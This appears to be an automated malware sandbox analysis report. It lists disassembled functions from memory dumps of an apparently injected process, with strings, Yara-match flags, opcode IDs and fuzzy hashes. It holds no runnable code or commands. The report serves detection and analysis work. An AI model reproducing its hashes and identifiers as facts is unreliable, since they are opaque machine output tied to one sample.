                                          Function 246FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 24737B7F
                                          • RTL: Resource at %p, xrefs: 24737B8E
                                          • RTL: Re-Waiting, xrefs: 24737BAC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 930b5431fcdb2b3fdcc97feb321124bce439d0495ed7abc04639ea508f3491ee
                                          • Instruction ID: 698fe8117473733c0eb93d4afa91c6ca39e4901372134a6a930d7158d351c48d
                                          • Opcode Fuzzy Hash: 930b5431fcdb2b3fdcc97feb321124bce439d0495ed7abc04639ea508f3491ee
                                          • Instruction Fuzzy Hash: 374102317017039FD710CE25CC40F6ABBE5EF99B10F010A6DE9AA9B781DB30E9058B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2473728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 247372A3
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 24737294
                                          • RTL: Re-Waiting, xrefs: 247372C1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: d873ca2e6170f1d28409284aa5341c21ff89a3f14edf9cfc06eec93b7f889968
                                          • Instruction ID: 2bc56c2cfaee50efc09fc6e7e1fbba7287471d7b9595162031037998613f6250
                                          • Opcode Fuzzy Hash: d873ca2e6170f1d28409284aa5341c21ff89a3f14edf9cfc06eec93b7f889968
                                          • Instruction Fuzzy Hash: E941F032700A02ABD711CE25CD81F5ABBB5FB94B10F104619FAA5AB745DB31E8428BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24707D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: 781c31da09cfcdc36d8f4c08997943bcb775974c2cbb77432dd31525e5a09f94
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 0891B470E02A159BDB14CF69C881AAEBBE5FF44760F50E51AE974EB3C5D730A941C720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 8fae1d1f8506d91c6d9b0c01b8c31b09a388024a003236d4ab598d150c63d4bc
                                          • Instruction ID: be7291c6ef3115a17cd0e971f14169f860a9eb32a25abee4604c9b9b66aca5ec
                                          • Opcode Fuzzy Hash: 8fae1d1f8506d91c6d9b0c01b8c31b09a388024a003236d4ab598d150c63d4bc
                                          • Instruction Fuzzy Hash: 5A811972D016699BDB21CF54CC45BEABBB8AF18750F0041EAEA19B7640D7309E84CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2474CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 2474CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4_w@4_w
                                          • API String ID: 4062629308-713214301
                                          • Opcode ID: a03d511004bac8aaba79185b45326126bfa6f90a193bdfd3c3f24f05071f9c6e
                                          • Instruction ID: 57ce376dc466ff80ae2bd387eb97cb6d72351bb9ba723db3fe3532a3ef534079
                                          • Opcode Fuzzy Hash: a03d511004bac8aaba79185b45326126bfa6f90a193bdfd3c3f24f05071f9c6e
                                          • Instruction Fuzzy Hash: 54417B72D00214DFDB21CFA5D880ABABBF8EF54B00F01452AE965EB368D7749941CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 058B7DA5 Relevance: 30.5, Strings: 24, Instructions: 461COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: M$!g$$$'$0)$9b$9t$;$EN$F"$J$M3$N9$Py$R$cz$e$j$p$qr$qu$t$t<$t~
                                          • API String ID: 0-3062056613
                                          • Opcode ID: 33e26cb7874dfe04a5482fa9bb1b868d0cc66c401359d7ca49b7b608e408890c
                                          • Instruction ID: f8c28991b739adeede1196b5fa1319320a7fdce0d4bf7ad73867b042db7175d2
                                          • Opcode Fuzzy Hash: 33e26cb7874dfe04a5482fa9bb1b868d0cc66c401359d7ca49b7b608e408890c
                                          • Instruction Fuzzy Hash: 3542C2B0E05229CBEB24CF48C898BEDBBB6BB45308F1481D9C449AB381D7B55E85CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C5599 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6$O$S$\$s
                                          • API String ID: 0-3854637164
                                          • Opcode ID: 5691b6534a1dce0602d1d5c3b45c8bb8059f9411bf096bd3208051d9a1d93dc2
                                          • Instruction ID: f24fac5528fd1929367c8682b36e4d5d83bd556def9631bf07394a109dc99237
                                          • Opcode Fuzzy Hash: 5691b6534a1dce0602d1d5c3b45c8bb8059f9411bf096bd3208051d9a1d93dc2
                                          • Instruction Fuzzy Hash: 5E41A6B2A00219BADB10EF98EC48FEBF7F8EB44314F404199ED09D6101E775AE548BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D1E40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-190826338
                                          • Opcode ID: bf309b7dfbb9ad93272831be700a4d939e22b28fb28fef1d4121078c135fd964
                                          • Instruction ID: 394284b865f2fc4a8b55a81d6056e42441ff8f5463cf02964c8cf92cea1bd89a
                                          • Opcode Fuzzy Hash: bf309b7dfbb9ad93272831be700a4d939e22b28fb28fef1d4121078c135fd964
                                          • Instruction Fuzzy Hash: F501C9B6D01218AEDB40DFE8D9449EEBBF8AB08600F14426AD915F3241F7715A04CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B1D73 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 392fe12960d5466754fd46979948481a0700562cf443d6085a039829ab8312f5
                                          • Instruction ID: 08d368735fd3122b1b270e72859094817c9ae2f836df3f8e49330ef26a2126a8
                                          • Opcode Fuzzy Hash: 392fe12960d5466754fd46979948481a0700562cf443d6085a039829ab8312f5
                                          • Instruction Fuzzy Hash: 97411FB1D11219AFDB00CF99DC85AEEBBBCEF48750F10455AF914E6241E7B09A40CBE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5220 Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d12705000e9f587d9e439cbdeec7697adfadc95c26c4482fadc74e5feac4106f
                                          • Instruction ID: cff0357c67ce5838c6069a01077fdb72e4004a935bb60f59925f9303d6e8f6e6
                                          • Opcode Fuzzy Hash: d12705000e9f587d9e439cbdeec7697adfadc95c26c4482fadc74e5feac4106f
                                          • Instruction Fuzzy Hash: D231D6B5A10249ABCB14DF98D881EEFB7F9EF88304F108619FD09A7240D670A851CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5850 Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02e6009113c3a45100bb412bbb59ed62b8477bed2f22c717aed7f52e3adf8946
                                          • Instruction ID: c5415e0262846edb5084bfb0a0309d94e349fb302864e33a8f533b1f04530380
                                          • Opcode Fuzzy Hash: 02e6009113c3a45100bb412bbb59ed62b8477bed2f22c717aed7f52e3adf8946
                                          • Instruction Fuzzy Hash: 3D31E8B5A00249ABCB14DF99D881EEFB7F9EF88314F108619FD19A7240D774AC51CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5150 Relevance: .1, Instructions: 82COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7856ebdc677c4712773d297f5484a81600a79402716c03d30f7f3780b249c60d
                                          • Instruction ID: 16ae78219dd32d23fc9d639d13cb8be9fae73680cc5d58a69e3b1dc68033cf74
                                          • Opcode Fuzzy Hash: 7856ebdc677c4712773d297f5484a81600a79402716c03d30f7f3780b249c60d
                                          • Instruction Fuzzy Hash: AB21F7B5A00249ABDB14DF98DC85EAFB7E9EF88704F104119FD09A7240E674AC118BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C53E0 Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9855c48ee70fc19a3319c90f1b66827386d52972640b9c916c5b626bf86ab03
                                          • Instruction ID: ef2bfd761edbb239b9c97a12d214f1b4a3a6d1ab3e2703fa0577164cf526fc16
                                          • Opcode Fuzzy Hash: a9855c48ee70fc19a3319c90f1b66827386d52972640b9c916c5b626bf86ab03
                                          • Instruction Fuzzy Hash: 7211C2B23803157BF720AA199C82FAB779CDB85B11F644015FF08EA2C1D6B4FC0146B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5A70 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff71154dd7c1cffa5b2ebbacb4133e64fdc10be4a30c71b67e2899293519300b
                                          • Instruction ID: 867b2116ca6af2c18d53d6e97231204d49897cdbde66994af96d0954065efc1a
                                          • Opcode Fuzzy Hash: ff71154dd7c1cffa5b2ebbacb4133e64fdc10be4a30c71b67e2899293519300b
                                          • Instruction Fuzzy Hash: DC211AB5A00249ABDB10DF98DC85FAFB7A8EF88700F104519FD0997240E774A9518BA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D4F70 Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7430bde7412df0a1785ba3009730462c927ef57d8e54debac5ff077f5d736155
                                          • Instruction ID: 19e75200982d80d31e8db4f418ae299553df532e7d9393194d53e4f27776e179
                                          • Opcode Fuzzy Hash: 7430bde7412df0a1785ba3009730462c927ef57d8e54debac5ff077f5d736155
                                          • Instruction Fuzzy Hash: 29119175600754ABD610EBA8CC46FAFB7ACEF85700F104519FE599A280E7B479008BB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D1ED0 Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08df5e7cda677f66b1850fbda1d43bb09afd40b6d186eef6835f8927ec2e52ae
                                          • Instruction ID: d2b2c1aef7acf1fc6c15d5fb47d63ff4281c434861651864287078c8ecac9d16
                                          • Opcode Fuzzy Hash: 08df5e7cda677f66b1850fbda1d43bb09afd40b6d186eef6835f8927ec2e52ae
                                          • Instruction Fuzzy Hash: 7811ECB6D01218AFDB00DFE9D9409EFBBF8FF88610F14426AE915E7200E7705A058BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D4E10 Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33ed03a92275c829105d9f134c8c3926d8fbfdf02d2f26105ec5dae44881f86a
                                          • Instruction ID: b4ffe6de63da8a67d6991327cbe42ddbe5e31643c056b27dd3640ef784888056
                                          • Opcode Fuzzy Hash: 33ed03a92275c829105d9f134c8c3926d8fbfdf02d2f26105ec5dae44881f86a
                                          • Instruction Fuzzy Hash: 81114F756103487BD610EBA8CC46FABB3ACEF85710F104549FD5997280E6B4B9118BB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D3100 Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 295bf361c339ce16de7479b1a5e97c9b51fd7f67497f0b1d0779e9640aff1b11
                                          • Instruction ID: a8d4fa2e3516a27b8393fed5b6b0c052454e7be151117ea9819402a8b59cb4a3
                                          • Opcode Fuzzy Hash: 295bf361c339ce16de7479b1a5e97c9b51fd7f67497f0b1d0779e9640aff1b11
                                          • Instruction Fuzzy Hash: 5E1100B6D0121DAF9B40DFE9DC449EEFBFCEF48210F04456AE919E3201E7705A048BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D2A60 Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c45f2f7f361d2c1c063db54e6c2bf63d4bb52fe684ac4c2d010d8bf79d8aed9
                                          • Instruction ID: de299d61f200848775e5df3649e21dfefe0a8ce689f5b678e8d769a205c05384
                                          • Opcode Fuzzy Hash: 1c45f2f7f361d2c1c063db54e6c2bf63d4bb52fe684ac4c2d010d8bf79d8aed9
                                          • Instruction Fuzzy Hash: 2011E2B6D01218AF9B00DFEDD8409EEFBFCEF58210F14416AE919E7201E7705A05CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5DD0 Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7a878bcff765534f9ad3e084e271ef1c6618abef1b3ea8f1f9c4972bf99205b
                                          • Instruction ID: 0c65df0a117fc63cb98c28b56289689e32537b3efd24a3bf85421f8ff4d1bfe4
                                          • Opcode Fuzzy Hash: f7a878bcff765534f9ad3e084e271ef1c6618abef1b3ea8f1f9c4972bf99205b
                                          • Instruction Fuzzy Hash: 6501C0B6214208BBCB04DE89DC81EDB77ADAF8C754F508608FA09E3240D630FC518BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B1EC4 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdd84fbee78bfa2a1bb627105fe8a04a4d7cde411da42c69a6547f3f72b6b55e
                                          • Instruction ID: f0e4f2104e5c45ee6af790628299ea865c740cad88263af908377749e7b121e0
                                          • Opcode Fuzzy Hash: fdd84fbee78bfa2a1bb627105fe8a04a4d7cde411da42c69a6547f3f72b6b55e
                                          • Instruction Fuzzy Hash: 05F0BB732182415BE7104E6DBC58BD6BB9DEBC5234F140126FD5DCB351D6B2D812C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5060 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd4fb5908af4263691f74bb8f90a433bc99baae2d149e4f57b26ad65ec4e4585
                                          • Instruction ID: a00621b8fec3648e32f9d6db66f7583bdae2684580080788b420216ec5cfc49b
                                          • Opcode Fuzzy Hash: bd4fb5908af4263691f74bb8f90a433bc99baae2d149e4f57b26ad65ec4e4585
                                          • Instruction Fuzzy Hash: 45F08C76200208BBC700EE89CC41EDB73ACEF88710F108909FE08D7200DA30BC118BB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C5500 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                                          • Instruction ID: e84730d3dcb37c23ab33fc9d9f4944bf5ad47898b1f398fdfc666627da3f38e5
                                          • Opcode Fuzzy Hash: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                                          • Instruction Fuzzy Hash: ECF05E71815208ABDF14DF64D841BDEFBB5EB04320F2043AEE829DB280E6359B508791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D5CF0 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e4a2432eb2dcc023d649fbe1732d35828f74daab2f86ebfee185b3a0dce3078
                                          • Instruction ID: e8ed0cd995c7aed71035cca5e861830398c2efc960103f836ed9322a91888e6d
                                          • Opcode Fuzzy Hash: 1e4a2432eb2dcc023d649fbe1732d35828f74daab2f86ebfee185b3a0dce3078
                                          • Instruction Fuzzy Hash: 21E06576300308BBE610EE9DDC45EDB73ACEF88750F004419FE08A7240D631BD108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D79E0 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1df227437deaa022287d8d60046aa5d10eeffd3fbf12ccbce8b0854fac2970b9
                                          • Instruction ID: 77c357457eb34c40a6c30dc4680e19c8dd491dbc77a097d97e7763090f4577d8
                                          • Opcode Fuzzy Hash: 1df227437deaa022287d8d60046aa5d10eeffd3fbf12ccbce8b0854fac2970b9
                                          • Instruction Fuzzy Hash: EAE04F36B0221437D220658D9C09F97B79CDBC1E60F550065FE08EB241E968AE0082F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C54FE Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c54ae46994f1c895184396e1b78badd7e11a19b7e3c357b9abb492695b547260
                                          • Instruction ID: 1c796ee53e84baa93ebab2d5121245169835a4de758813828ea3139f16c77806
                                          • Opcode Fuzzy Hash: c54ae46994f1c895184396e1b78badd7e11a19b7e3c357b9abb492695b547260
                                          • Instruction Fuzzy Hash: A9E09271925108ABDF08CF64E941BADFBB6EF04320F2043AEEC19DB680D639DB548751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058D59E0 Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7daa792845eb9cf026e0dc15e8a9c3662e61cae48a64ca2f45f2457a9e602308
                                          • Instruction ID: a846ff518b81b05ba9dff1f2c3c8823507748582980886eb6881b87c3a6b55ce
                                          • Opcode Fuzzy Hash: 7daa792845eb9cf026e0dc15e8a9c3662e61cae48a64ca2f45f2457a9e602308
                                          • Instruction Fuzzy Hash: A6E04F362003147BD110AA59DC05FDBB79CDFC5750F104415FA09A7140DA71B90186B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B8728 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
